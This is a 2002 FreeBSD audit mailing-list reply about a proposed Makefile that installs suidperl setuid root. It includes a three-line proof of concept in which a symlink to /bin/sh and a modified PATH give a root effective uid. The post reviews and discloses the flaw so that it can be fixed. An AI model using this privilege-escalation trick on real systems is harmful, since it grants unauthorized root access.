From owner-freebsd-audit Thu Jul 4 5:11:55 2002 Delivered-To: freebsd-audit@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C352D37B400 for ; Thu, 4 Jul 2002 05:11:53 -0700 (PDT) Received: from dilbert.robbins.dropbear.id.au (215.c.011.mel.iprimus.net.au [210.50.218.215]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8F7DC43E3B for ; Thu, 4 Jul 2002 05:11:51 -0700 (PDT) (envelope-from tim@robbins.dropbear.id.au) Received: from dilbert.robbins.dropbear.id.au (tim@localhost [127.0.0.1]) by dilbert.robbins.dropbear.id.au (8.12.3/8.12.3) with ESMTP id g64CBkcT053800; Thu, 4 Jul 2002 22:11:46 +1000 (EST) (envelope-from tim@dilbert.robbins.dropbear.id.au) Received: (from tim@localhost) by dilbert.robbins.dropbear.id.au (8.12.3/8.12.3/Submit) id g64CAV8e053759; Thu, 4 Jul 2002 22:10:31 +1000 (EST) Date: Thu, 4 Jul 2002 22:10:31 +1000 From: Tim Robbins To: Akinori MUSHA Cc: audit@FreeBSD.ORG Subject: Re: suidperl Message-ID: <20020704221031.A53275@dilbert.robbins.dropbear.id.au> References: <86sn2zpzmp.wl@daemon.musha.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <86sn2zpzmp.wl@daemon.musha.org>; from knu@iDaemons.org on Thu, Jul 04, 2002 at 07:15:58PM +0900 Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thu, Jul 04, 2002 at 07:15:58PM +0900, Akinori MUSHA wrote: > Index: src/usr.bin/suidperl/Makefile > =================================================================== > RCS file: src/usr.bin/suidperl/Makefile > diff -N src/usr.bin/suidperl/Makefile > --- /dev/null 1 Jan 1970 00:00:00 -0000 > +++ src/usr.bin/suidperl/Makefile 4 Jul 2002 10:08:12 -0000 > @@ -0,0 +1,15 @@ > +# $FreeBSD$ > + > +.PATH: ${.CURDIR}/../perl > + > +PROG= suidperl > +SRCS= perl.c > +NOMAN= > +WARNS?= 6 > + > +BINOWN= root > +.if defined(ENABLE_SUIDPERL) > +BINMODE=4555 > +.endif This is unsafe: $ ln -s /bin/sh /tmp/perl $ env PATH=/tmp:$PATH /usr/bin/perl # id uid=1001(tim) euid=0(root) gid=1001(tim) groups=1001(tim), 0(wheel) Tim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message